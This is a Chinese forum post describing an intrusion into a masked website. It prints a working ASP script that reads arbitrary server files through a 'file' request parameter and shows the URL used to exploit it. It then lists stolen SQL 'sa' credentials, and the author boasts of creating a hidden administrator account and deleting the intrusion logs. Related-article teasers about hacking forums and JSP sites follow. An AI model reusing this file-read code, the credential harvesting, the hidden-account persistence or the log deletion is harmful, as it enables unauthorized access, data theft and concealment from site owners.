攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
-------------------------------------------------------------------------
<%
file=request("file")
set fsoobj=server.createobject("scripting.filesystemobject")
if fsoobj.fileexists(file) then
set myfile=fsoobj.opentextfile(file,1)
response.write "<pre>" & server.htmlencode(myfile.readall) &"</pre>"
myfile.close
set myfile=nothing
else
response.write "file(" & file & ") not exists."
end if
%>
-------------------------------------------------------------------------
http://www.***.com/view.asp?file=d:\wwwroot\index.asp
读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f
利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
论坛通用入侵一条龙教学(图)
目前网上有种新的趋势,黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所,而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同,因此对大家的网...
[阅读全文]
-
-
追踪入侵JSP网站服务器
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务...
[阅读全文]
-
-
-
-
-
-
网友评论